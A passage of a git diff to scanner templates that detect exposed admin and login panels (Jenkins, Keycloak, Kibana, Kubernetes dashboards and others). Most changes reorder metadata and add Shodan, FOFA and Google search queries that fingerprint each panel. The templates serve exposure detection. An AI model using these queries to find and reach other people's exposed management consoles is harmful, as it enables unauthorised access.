panel,connectsecure,login,ivanti http: diff --git a/http/exposed-panels/ixcache-panel.yaml b/http/exposed-panels/ixcache-panel.yaml index 00d153a95e..15a3d347c1 100644 --- a/http/exposed-panels/ixcache-panel.yaml +++ b/http/exposed-panels/ixcache-panel.yaml @@ -11,8 +11,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: app="iXCache" max-request: 1 + fofa-query: app="iXCache" tags: ixcache,panel http: diff --git a/http/exposed-panels/jamf-login.yaml b/http/exposed-panels/jamf-login.yaml index f5b1aadfcb..ff7b181a4b 100644 --- a/http/exposed-panels/jamf-login.yaml +++ b/http/exposed-panels/jamf-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Jamf Pro" - verified: true tags: panel,jamf http: diff --git a/http/exposed-panels/jamf-setup-assistant.yaml b/http/exposed-panels/jamf-setup-assistant.yaml index af8e1bacbe..fe6b25f3cf 100644 --- a/http/exposed-panels/jamf-setup-assistant.yaml +++ b/http/exposed-panels/jamf-setup-assistant.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"Jamf Pro Setup" - verified: true tags: jamf,setup,panel http: diff --git a/http/exposed-panels/jaspersoft-panel.yaml b/http/exposed-panels/jaspersoft-panel.yaml index e0cf31ab64..fcfa6977e8 100644 --- a/http/exposed-panels/jaspersoft-panel.yaml +++ b/http/exposed-panels/jaspersoft-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:tibco:jaspersoft:*:*:*:*:aws_with_multi-tenancy:*:*:* metadata: max-request: 2 - product: jaspersoft - shodan-query: http.title:"Jaspersoft" vendor: tibco + product: jaspersoft + shodan-query: + - http.title:"Jaspersoft" + - http.title:"jaspersoft" + fofa-query: title="jaspersoft" + google-query: intitle:"jaspersoft" tags: panel,jaspersoft,tibco http: diff --git a/http/exposed-panels/jboss/jboss-jbpm-admin.yaml b/http/exposed-panels/jboss/jboss-jbpm-admin.yaml index fd09285f8a..ca2f8d6aaf 100644 --- a/http/exposed-panels/jboss/jboss-jbpm-admin.yaml +++ b/http/exposed-panels/jboss/jboss-jbpm-admin.yaml @@ -12,11 +12,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:redhat:jbpm:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: jbpm - shodan-query: html:"JBossWS" - vendor: redhat verified: true + max-request: 1 + vendor: redhat + product: jbpm + shodan-query: + - html:"JBossWS" + - http.html:"jbossws" + fofa-query: body="jbossws" tags: jboss,panel,login,redhat http: diff --git a/http/exposed-panels/jboss/jboss-juddi.yaml b/http/exposed-panels/jboss/jboss-juddi.yaml index 236e48f9eb..955dbabf49 100644 --- a/http/exposed-panels/jboss/jboss-juddi.yaml +++ b/http/exposed-panels/jboss/jboss-juddi.yaml @@ -6,19 +6,22 @@ info: severity: info description: | The jUDDI (Java Universal Description, Discovery and Integration) Registry is a core component of the JBoss Enterprise SOA Platform. It is the product's default service registry and comes included as part of the product. In it are stored the addresses (end-point references) of all the services connected to the Enterprise Service Bus. It was implemented in JAXR and conforms to the UDDI specifications. + remediation: Restrict access to the service if not needed. reference: - https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/JBossJuddi.java - remediation: Restrict access to the service if not needed. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 cpe: cpe:2.3:a:redhat:jboss_enterprise_web_platform:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: jboss_enterprise_web_platform - shodan-query: html:"JBoss WS" - vendor: redhat verified: true + max-request: 2 + vendor: redhat + product: jboss_enterprise_web_platform + shodan-query: + - html:"JBoss WS" + - http.html:"jboss ws" + fofa-query: body="jboss ws" tags: panel,jboss,juddi,redhat http: diff --git a/http/exposed-panels/jboss/jboss-soa-platform.yaml b/http/exposed-panels/jboss/jboss-soa-platform.yaml index ff7e92a740..d287b7a6f7 100644 --- a/http/exposed-panels/jboss/jboss-soa-platform.yaml +++ b/http/exposed-panels/jboss/jboss-soa-platform.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:redhat:jboss_soa_platform:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: jboss_soa_platform - shodan-query: http.title:"Welcome to the JBoss SOA Platform" - vendor: redhat verified: true + max-request: 1 + vendor: redhat + product: jboss_soa_platform + shodan-query: + - http.title:"Welcome to the JBoss SOA Platform" + - http.title:"welcome to the jboss soa platform" + fofa-query: title="welcome to the jboss soa platform" + google-query: intitle:"welcome to the jboss soa platform" tags: panel,jboss,soa,redhat http: diff --git a/http/exposed-panels/jboss/jmx-console.yaml b/http/exposed-panels/jboss/jmx-console.yaml index bc12927cd8..59601aa576 100644 --- a/http/exposed-panels/jboss/jmx-console.yaml +++ b/http/exposed-panels/jboss/jmx-console.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:redhat:jboss_keycloak:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: jboss_keycloak vendor: redhat + product: jboss_keycloak tags: panel,jmx,jboss,redhat http: diff --git a/http/exposed-panels/jboss/wildfly-panel.yaml b/http/exposed-panels/jboss/wildfly-panel.yaml index 504744f093..db5d986c66 100644 --- a/http/exposed-panels/jboss/wildfly-panel.yaml +++ b/http/exposed-panels/jboss/wildfly-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:redhat:wildfly:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: wildfly vendor: redhat + product: wildfly tags: panel,jboss,wildfly,redhat http: diff --git a/http/exposed-panels/jcms-panel.yaml b/http/exposed-panels/jcms-panel.yaml index 6e4d3d8c79..17ab122f13 100644 --- a/http/exposed-panels/jcms-panel.yaml +++ b/http/exposed-panels/jcms-panel.yaml @@ -12,11 +12,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:jalios:jcms:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: jcms - shodan-query: html:"Jalios JCMS" - vendor: jalios verified: true + max-request: 2 + vendor: jalios + product: jcms + shodan-query: + - html:"Jalios JCMS" + - http.html:"jalios jcms" + fofa-query: body="jalios jcms" tags: panel,jalios,jcms http: diff --git a/http/exposed-panels/jedox-web-panel.yaml b/http/exposed-panels/jedox-web-panel.yaml index 2253762d0e..9891234af4 100644 --- a/http/exposed-panels/jedox-web-panel.yaml +++ b/http/exposed-panels/jedox-web-panel.yaml @@ -11,12 +11,21 @@ info: classification: cpe: cpe:2.3:a:jedox:jedox:*:*:*:*:*:*:*:* metadata: - google-query: intitle:"Jedox Web Login" - max-request: 2 - product: jedox - shodan-query: title:"Jedox Web - Login" - vendor: jedox verified: true + max-request: 2 + vendor: jedox + product: jedox + shodan-query: + - title:"Jedox Web - Login" + - http.title:"jedox web - login" + - http.title:"jedox web login" + google-query: + - intitle:"Jedox Web Login" + - intitle:"jedox web login" + - intitle:"jedox web - login" + fofa-query: + - title="jedox web login" + - title="jedox web - login" tags: panel,jedox,detect http: diff --git a/http/exposed-panels/jeedom-panel.yaml b/http/exposed-panels/jeedom-panel.yaml index 3559df12db..a274bee59e 100644 --- a/http/exposed-panels/jeedom-panel.yaml +++ b/http/exposed-panels/jeedom-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:jeedom:jeedom:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: jeedom - shodan-query: http.title:"Jeedom" vendor: jeedom + product: jeedom + shodan-query: + - http.title:"Jeedom" + - http.title:"jeedom" + fofa-query: title="jeedom" + google-query: intitle:"jeedom" tags: panel,jeedom,login http: diff --git a/http/exposed-panels/jellyseerr-login-panel.yaml b/http/exposed-panels/jellyseerr-login-panel.yaml index be7e9325bf..9faacd5d31 100644 --- a/http/exposed-panels/jellyseerr-login-panel.yaml +++ b/http/exposed-panels/jellyseerr-login-panel.yaml @@ -7,9 +7,9 @@ info: reference: - https://github.com/Fallenbagel/jellyseerr metadata: + verified: true max-request: 2 shodan-query: http.favicon.hash:-2017604252 - verified: true tags: panel,jellyseerr,detect http: diff --git a/http/exposed-panels/jenkins-api-panel.yaml b/http/exposed-panels/jenkins-api-panel.yaml index 5dcd1de78f..b58a61bbbf 100644 --- a/http/exposed-panels/jenkins-api-panel.yaml +++ b/http/exposed-panels/jenkins-api-panel.yaml @@ -11,8 +11,13 @@ info: cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: jenkins vendor: jenkins + product: jenkins + shodan-query: + - cpe:"cpe:2.3:a:jenkins:jenkins" + - http.favicon.hash:81586312 + - product:"jenkins" + fofa-query: icon_hash=81586312 tags: panel,api,jenkins http: diff --git a/http/exposed-panels/jenkins-login.yaml b/http/exposed-panels/jenkins-login.yaml index 0ea29f7978..ddf2fdd652 100644 --- a/http/exposed-panels/jenkins-login.yaml +++ b/http/exposed-panels/jenkins-login.yaml @@ -5,16 +5,21 @@ info: author: pdteam severity: info description: Jenkins is an open source automation server. + remediation: Ensure proper access. reference: - https://www.jenkins.io/doc/book/security/ - remediation: Ensure proper access. classification: cwe-id: CWE-200 cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: jenkins vendor: jenkins + product: jenkins + shodan-query: + - cpe:"cpe:2.3:a:jenkins:jenkins" + - http.favicon.hash:81586312 + - product:"jenkins" + fofa-query: icon_hash=81586312 tags: panel,jenkins http: diff --git a/http/exposed-panels/jfrog-login.yaml b/http/exposed-panels/jfrog-login.yaml index 73afbece5f..4054c09520 100644 --- a/http/exposed-panels/jfrog-login.yaml +++ b/http/exposed-panels/jfrog-login.yaml @@ -13,8 +13,8 @@ info: cwe-id: CWE-200 metadata: verified: true - max-request: 1 - shodan-query: http.title:"JFrog" + max-request: 2 + shodan-query: "http.title:\"JFrog\"" tags: panel,jfrog,edb,detect,login http: diff --git a/http/exposed-panels/joomla-panel.yaml b/http/exposed-panels/joomla-panel.yaml index 8b348589bc..1479f043f2 100644 --- a/http/exposed-panels/joomla-panel.yaml +++ b/http/exposed-panels/joomla-panel.yaml @@ -8,8 +8,13 @@ info: cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: joomla\! vendor: joomla + product: joomla\! + shodan-query: + - http.html:"joomla! - open source content management" + - http.component:"joomla" + - cpe:"cpe:2.3:a:joomla:joomla\!" + fofa-query: body="joomla! - open source content management" tags: panel,joomla http: diff --git a/http/exposed-panels/jorani-panel.yaml b/http/exposed-panels/jorani-panel.yaml index 51e3b81b5b..02e66387ff 100644 --- a/http/exposed-panels/jorani-panel.yaml +++ b/http/exposed-panels/jorani-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: html:"Login - Jorani" - verified: true tags: panel,jorani,login http: diff --git a/http/exposed-panels/jsherp-boot-panel.yaml b/http/exposed-panels/jsherp-boot-panel.yaml index b63038f32b..70d678ccab 100644 --- a/http/exposed-panels/jsherp-boot-panel.yaml +++ b/http/exposed-panels/jsherp-boot-panel.yaml @@ -5,9 +5,9 @@ info: author: DhiyaneshDk severity: info metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:-1298131932 - verified: true tags: panel,jsherp,login,detect http: diff --git a/http/exposed-panels/jumpserver-panel.yaml b/http/exposed-panels/jumpserver-panel.yaml index 94e58f7239..84e8d8bd26 100644 --- a/http/exposed-panels/jumpserver-panel.yaml +++ b/http/exposed-panels/jumpserver-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:'JumpServer' - verified: true zoomeye-query: title:'JumpServer' tags: panel,jumpserver diff --git a/http/exposed-panels/juniper-panel.yaml b/http/exposed-panels/juniper-panel.yaml index 874135d346..1bd9ddfa79 100644 --- a/http/exposed-panels/juniper-panel.yaml +++ b/http/exposed-panels/juniper-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Juniper Web Device Manager" - verified: true tags: panel,juniper,vpn,login http: diff --git a/http/exposed-panels/kafka-center-login.yaml b/http/exposed-panels/kafka-center-login.yaml index d329aac6c3..4fee3649c2 100644 --- a/http/exposed-panels/kafka-center-login.yaml +++ b/http/exposed-panels/kafka-center-login.yaml @@ -11,9 +11,18 @@ info: cpe: cpe:2.3:a:apache:kafka:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: kafka - shodan-query: http.title:"Kafka Center" vendor: apache + product: kafka + shodan-query: + - http.title:"Kafka Center" + - http.title:"kafka center" + - http.title:"kafka consumer offset monitor" + fofa-query: + - title="kafka center" + - title="kafka consumer offset monitor" + google-query: + - intitle:"kafka center" + - intitle:"kafka consumer offset monitor" tags: panel,kafka,apache http: diff --git a/http/exposed-panels/kafka-consumer-monitor.yaml b/http/exposed-panels/kafka-consumer-monitor.yaml index 84989f2823..b3b998baed 100644 --- a/http/exposed-panels/kafka-consumer-monitor.yaml +++ b/http/exposed-panels/kafka-consumer-monitor.yaml @@ -11,9 +11,18 @@ info: cpe: cpe:2.3:a:apache:kafka:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: kafka - shodan-query: http.title:"Kafka Consumer Offset Monitor" vendor: apache + product: kafka + shodan-query: + - http.title:"Kafka Consumer Offset Monitor" + - http.title:"kafka center" + - http.title:"kafka consumer offset monitor" + fofa-query: + - title="kafka center" + - title="kafka consumer offset monitor" + google-query: + - intitle:"kafka center" + - intitle:"kafka consumer offset monitor" tags: panel,kafka,apache http: diff --git a/http/exposed-panels/kafka-monitoring.yaml b/http/exposed-panels/kafka-monitoring.yaml index a718eb2282..c0ecab3014 100644 --- a/http/exposed-panels/kafka-monitoring.yaml +++ b/http/exposed-panels/kafka-monitoring.yaml @@ -11,8 +11,17 @@ info: cpe: cpe:2.3:a:apache:kafka:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: kafka vendor: apache + product: kafka + shodan-query: + - http.title:"kafka center" + - http.title:"kafka consumer offset monitor" + fofa-query: + - title="kafka center" + - title="kafka consumer offset monitor" + google-query: + - intitle:"kafka center" + - intitle:"kafka consumer offset monitor" tags: panel,kafka,apache http: diff --git a/http/exposed-panels/kafka-topics-ui.yaml b/http/exposed-panels/kafka-topics-ui.yaml index ee3176e197..d66f120ca8 100644 --- a/http/exposed-panels/kafka-topics-ui.yaml +++ b/http/exposed-panels/kafka-topics-ui.yaml @@ -14,9 +14,9 @@ info: cpe: cpe:2.3:a:provectus:ui:*:*:*:*:kafka:*:*:* metadata: max-request: 2 - platform: kafka - product: ui vendor: provectus + product: ui + platform: kafka tags: panel,kafka,apache,detect,provectus http: diff --git a/http/exposed-panels/kanboard-login.yaml b/http/exposed-panels/kanboard-login.yaml index eb355cb888..4aba38c7ad 100644 --- a/http/exposed-panels/kanboard-login.yaml +++ b/http/exposed-panels/kanboard-login.yaml @@ -10,11 +10,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:kanboard:kanboard:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: kanboard product: kanboard shodan-query: http.favicon.hash:2056442365 - vendor: kanboard - verified: true + fofa-query: icon_hash=2056442365 tags: panel,kanboard http: diff --git a/http/exposed-panels/kasm-login-panel.yaml b/http/exposed-panels/kasm-login-panel.yaml index ae8db990d7..f168590290 100644 --- a/http/exposed-panels/kasm-login-panel.yaml +++ b/http/exposed-panels/kasm-login-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.favicon.hash:-2144699833 - verified: true tags: panel,kasm,login,detect http: diff --git a/http/exposed-panels/kavita-panel-detect.yaml b/http/exposed-panels/kavita-panel-detect.yaml index 37ae6f4ace..02dbe85a68 100644 --- a/http/exposed-panels/kavita-panel-detect.yaml +++ b/http/exposed-panels/kavita-panel-detect.yaml @@ -12,9 +12,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"kavita" - verified: true + product: kavita + vendor: kavitareader + fofa-query: title="kavita" + google-query: intitle:"kavita" tags: panel,kavita http: diff --git a/http/exposed-panels/kenesto-login.yaml b/http/exposed-panels/kenesto-login.yaml index 789fc4d1a0..9c7e4a97c9 100644 --- a/http/exposed-panels/kenesto-login.yaml +++ b/http/exposed-panels/kenesto-login.yaml @@ -11,8 +11,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: app="kenesto" max-request: 1 + fofa-query: app="kenesto" tags: login,tech,kenesto,panel http: diff --git a/http/exposed-panels/kettle-panel.yaml b/http/exposed-panels/kettle-panel.yaml index 4199c91c89..91bee88751 100644 --- a/http/exposed-panels/kettle-panel.yaml +++ b/http/exposed-panels/kettle-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: basic realm="Kettle" - verified: true tags: panel,kettle http: diff --git a/http/exposed-panels/keycloak-admin-panel.yaml b/http/exposed-panels/keycloak-admin-panel.yaml index 48e890ebd1..294ff79fc4 100644 --- a/http/exposed-panels/keycloak-admin-panel.yaml +++ b/http/exposed-panels/keycloak-admin-panel.yaml @@ -10,11 +10,19 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:* metadata: - max-request: 3 - product: keycloak - shodan-query: http.favicon.hash:-1105083093 - vendor: redhat verified: true + max-request: 3 + vendor: redhat + product: keycloak + shodan-query: + - http.favicon.hash:-1105083093 + - http.title:"keycloak" + - http.html:"keycloak" + fofa-query: + - icon_hash=-1105083093 + - body="keycloak" + - title="keycloak" + google-query: intitle:"keycloak" tags: panel,keycloak,redhat http: diff --git a/http/exposed-panels/kibana-panel.yaml b/http/exposed-panels/kibana-panel.yaml index de0f9663c9..40cfd4d8f6 100644 --- a/http/exposed-panels/kibana-panel.yaml +++ b/http/exposed-panels/kibana-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* metadata: max-request: 3 - product: kibana - shodan-query: http.title:"Kibana" vendor: elastic + product: kibana + shodan-query: + - http.title:"Kibana" + - http.title:"kibana" + fofa-query: title="kibana" + google-query: intitle:"kibana" tags: panel,kibana,elastic http: diff --git a/http/exposed-panels/kiteworks-pcn-panel.yaml b/http/exposed-panels/kiteworks-pcn-panel.yaml index 3941b2c4b6..22ecce8d76 100644 --- a/http/exposed-panels/kiteworks-pcn-panel.yaml +++ b/http/exposed-panels/kiteworks-pcn-panel.yaml @@ -11,11 +11,12 @@ info: classification: cpe: cpe:2.3:a:accellion:kiteworks:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: accellion product: kiteworks shodan-query: http.favicon.hash:-1215318992 - vendor: accellion - verified: true + fofa-query: icon_hash=-1215318992 tags: panel,kiteworks,login,detect,accellion http: diff --git a/http/exposed-panels/kiwitcms-login.yaml b/http/exposed-panels/kiwitcms-login.yaml index eb09c731fe..862123eba6 100644 --- a/http/exposed-panels/kiwitcms-login.yaml +++ b/http/exposed-panels/kiwitcms-login.yaml @@ -13,9 +13,13 @@ info: cpe: cpe:2.3:a:kiwitcms:kiwi_tcms:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: kiwi_tcms - shodan-query: title:"Kiwi TCMS - Login" http.favicon.hash:-1909533337 vendor: kiwitcms + product: kiwi_tcms + shodan-query: + - title:"Kiwi TCMS - Login" http.favicon.hash:-1909533337 + - http.title:"kiwi tcms - login" http.favicon.hash:-1909533337 + fofa-query: title="kiwi tcms - login" http.favicon.hash:-1909533337 + google-query: intitle:"kiwi tcms - login" http.favicon.hash:-1909533337 tags: kiwitcms,panel http: diff --git a/http/exposed-panels/kkfileview-panel.yaml b/http/exposed-panels/kkfileview-panel.yaml index 55dbbfd9ed..57283e8efc 100644 --- a/http/exposed-panels/kkfileview-panel.yaml +++ b/http/exposed-panels/kkfileview-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"kkFileView" - verified: true tags: panel,kkfileview http: diff --git a/http/exposed-panels/klr300n-panel.yaml b/http/exposed-panels/klr300n-panel.yaml index 7366d676ed..8d7f97df3a 100644 --- a/http/exposed-panels/klr300n-panel.yaml +++ b/http/exposed-panels/klr300n-panel.yaml @@ -10,9 +10,9 @@ info: - http://www.keo.com.br/produtos/roteador-klr-300n - http://www.keo.com.br/wp-content/uploads/2017/09/Manual_KLR_300N_03-17_site.pdf metadata: - fofa-query: Roteador Wireless KLR 300N - max-request: 1 verified: true + max-request: 1 + fofa-query: Roteador Wireless KLR 300N tags: keo,klr300n,panel,login http: diff --git a/http/exposed-panels/kodak-network-panel.yaml b/http/exposed-panels/kodak-network-panel.yaml index 67bc929959..2ed52a106a 100644 --- a/http/exposed-panels/kodak-network-panel.yaml +++ b/http/exposed-panels/kodak-network-panel.yaml @@ -7,9 +7,9 @@ info: description: | A Kedacom network keyboard console panel was detected. metadata: - fofa-query: 网络键盘控制台 - max-request: 1 verified: true + max-request: 1 + fofa-query: 网络键盘控制台 tags: panel,login,kedacom,network http: diff --git a/http/exposed-panels/koel-panel.yaml b/http/exposed-panels/koel-panel.yaml index a0385811fa..08a11e2039 100644 --- a/http/exposed-panels/koel-panel.yaml +++ b/http/exposed-panels/koel-panel.yaml @@ -10,9 +10,9 @@ info: - https://koel.dev/ - https://github.com/koel/koel metadata: + verified: true max-request: 1 shodan-query: title:"Koel" - verified: true tags: panel,koel,login http: diff --git a/http/exposed-panels/konga-panel.yaml b/http/exposed-panels/konga-panel.yaml index dcb714ce86..3e4274000a 100644 --- a/http/exposed-panels/konga-panel.yaml +++ b/http/exposed-panels/konga-panel.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:pantsel:konga:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: konga vendor: pantsel + product: konga tags: tech,konga,oss,panel,pantsel http: diff --git a/http/exposed-panels/kopano-webapp-panel.yaml b/http/exposed-panels/kopano-webapp-panel.yaml index 2c6f0c4b71..d18c9d7d25 100644 --- a/http/exposed-panels/kopano-webapp-panel.yaml +++ b/http/exposed-panels/kopano-webapp-panel.yaml @@ -8,9 +8,9 @@ info: reference: - https://kopano.com/ metadata: + verified: true max-request: 1 shodan-query: http.title:"Kopano WebApp" - verified: true tags: panel,kopano,login,detect http: diff --git a/http/exposed-panels/kraken-cluster-monitoring.yaml b/http/exposed-panels/kraken-cluster-monitoring.yaml index 8dd6d119a6..f2d810aefb 100644 --- a/http/exposed-panels/kraken-cluster-monitoring.yaml +++ b/http/exposed-panels/kraken-cluster-monitoring.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Kraken dashboard" - verified: true tags: panel,kraken,cluster http: diff --git a/http/exposed-panels/kubernetes-dashboard.yaml b/http/exposed-panels/kubernetes-dashboard.yaml index 34e3a778cc..60ae7d118c 100644 --- a/http/exposed-panels/kubernetes-dashboard.yaml +++ b/http/exposed-panels/kubernetes-dashboard.yaml @@ -10,8 +10,9 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - product: dashboard vendor: kubernetes + product: dashboard + shodan-query: product:"kubernetes" tags: panel,kubernetes,devops http: diff --git a/http/exposed-panels/kubernetes-enterprise-manager.yaml b/http/exposed-panels/kubernetes-enterprise-manager.yaml index 2703b5ccb3..daf425630a 100644 --- a/http/exposed-panels/kubernetes-enterprise-manager.yaml +++ b/http/exposed-panels/kubernetes-enterprise-manager.yaml @@ -10,10 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:* metadata: - fofa-query: app="Kubernetes-Enterprise-Manager" max-request: 1 - product: kubernetes vendor: kubernetes + product: kubernetes + fofa-query: + - app="Kubernetes-Enterprise-Manager" + - title="kubernetes web view" + - app="kubernetes-enterprise-manager" + shodan-query: http.title:"kubernetes web view" + google-query: intitle:"kubernetes web view" tags: tech,kubernetes,panel http: diff --git a/http/exposed-panels/kubernetes-mirantis.yaml b/http/exposed-panels/kubernetes-mirantis.yaml index 63903170f1..1d8f7c856d 100644 --- a/http/exposed-panels/kubernetes-mirantis.yaml +++ b/http/exposed-panels/kubernetes-mirantis.yaml @@ -9,10 +9,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: app="Mirantis-Kubernetes-Engine" + verified: true max-request: 1 shodan-query: http.html:"Mirantis Kubernetes Engine" - verified: true + fofa-query: app="Mirantis-Kubernetes-Engine" tags: tech,kubernetes,devops,kube,k8s,panel http: diff --git a/http/exposed-panels/kubernetes-web-view.yaml b/http/exposed-panels/kubernetes-web-view.yaml index 4f00638cae..f286c3b30b 100644 --- a/http/exposed-panels/kubernetes-web-view.yaml +++ b/http/exposed-panels/kubernetes-web-view.yaml @@ -11,11 +11,17 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: kubernetes - shodan-query: title:"Kubernetes Web View" - vendor: kubernetes verified: true + max-request: 2 + vendor: kubernetes + product: kubernetes + shodan-query: + - title:"Kubernetes Web View" + - http.title:"kubernetes web view" + fofa-query: + - title="kubernetes web view" + - app="kubernetes-enterprise-manager" + google-query: intitle:"kubernetes web view" tags: panel,misconfig,kubernetes,k8s http: diff --git a/http/exposed-panels/kubeview-dashboard.yaml b/http/exposed-panels/kubeview-dashboard.yaml index 95d6f14f14..5a020b406d 100644 --- a/http/exposed-panels/kubeview-dashboard.yaml +++ b/http/exposed-panels/kubeview-dashboard.yaml @@ -10,11 +10,17 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 1 - product: kubeview - shodan-query: http.favicon.hash:-379154636 - vendor: kubeview_project verified: true + max-request: 1 + vendor: kubeview_project + product: kubeview + shodan-query: + - http.favicon.hash:-379154636 + - http.title:"kubeview" + fofa-query: + - icon_hash=-379154636 + - title="kubeview" + google-query: intitle:"kubeview" tags: exposure,k8s,kubernetes,kubeview,dashboard,panel,kubeview_project http: diff --git a/http/exposed-panels/labkey-server-login.yaml b/http/exposed-panels/labkey-server-login.yaml index ca086da89c..399d6f2dd4 100644 --- a/http/exposed-panels/labkey-server-login.yaml +++ b/http/exposed-panels/labkey-server-login.yaml @@ -10,11 +10,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:labkey:labkey_server:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: labkey_server - shodan-query: 'title:"Sign In: /home"' - vendor: labkey verified: true + max-request: 2 + vendor: labkey + product: labkey_server + shodan-query: + - 'title:"Sign In: /home"' + - 'http.title:"sign in: /home"' + - "server: labkey" + fofa-query: 'title="sign in: /home"' + google-query: 'intitle:"sign in: /home"' tags: panel,labkey http: diff --git a/http/exposed-panels/labtech-panel.yaml b/http/exposed-panels/labtech-panel.yaml index 03d12747aa..99f8540c2e 100644 --- a/http/exposed-panels/labtech-panel.yaml +++ b/http/exposed-panels/labtech-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:labtech_software:labtech:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: labtech vendor: labtech_software + product: labtech tags: panel,labtech,labtech_software http: diff --git a/http/exposed-panels/lancom-router-panel.yaml b/http/exposed-panels/lancom-router-panel.yaml index c71df494f3..d785944471 100644 --- a/http/exposed-panels/lancom-router-panel.yaml +++ b/http/exposed-panels/lancom-router-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: html:"LANCOM Systems GmbH" - verified: true tags: panel,lancom,router http: diff --git a/http/exposed-panels/lansweeper-login.yaml b/http/exposed-panels/lansweeper-login.yaml index d6ee32ec14..df6545cd22 100644 --- a/http/exposed-panels/lansweeper-login.yaml +++ b/http/exposed-panels/lansweeper-login.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:lansweeper:lansweeper:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: lansweeper - shodan-query: 